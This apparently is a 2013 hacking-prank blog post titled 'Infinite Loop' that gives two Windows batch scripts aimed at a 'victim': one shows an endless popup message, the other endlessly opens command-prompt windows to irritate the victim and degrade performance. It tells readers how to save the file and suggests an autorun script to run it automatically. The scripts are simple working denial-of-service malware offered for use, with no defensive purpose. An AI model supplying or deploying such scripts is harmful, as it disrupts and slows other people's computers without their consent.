Nuffnang Ads

Showing posts with label loop. Show all posts
Showing posts with label loop. Show all posts

Monday, June 17, 2013

Infinite Loop

This code will continuously show message to the target machine until the victim manually close it.
Copy the following code into notepad:
@ECHO off
:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN


This code will continuously open up command prompt screen infinite times and  irritate victim and affecting performance.
Copy the following code into notepad:
:x
start cmd.exe

GOTO x

save as Hackmimic_msg.bat, then you can open the file.

*You can replace with any message after the echo tag with a space.
*You can put multiple echo as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~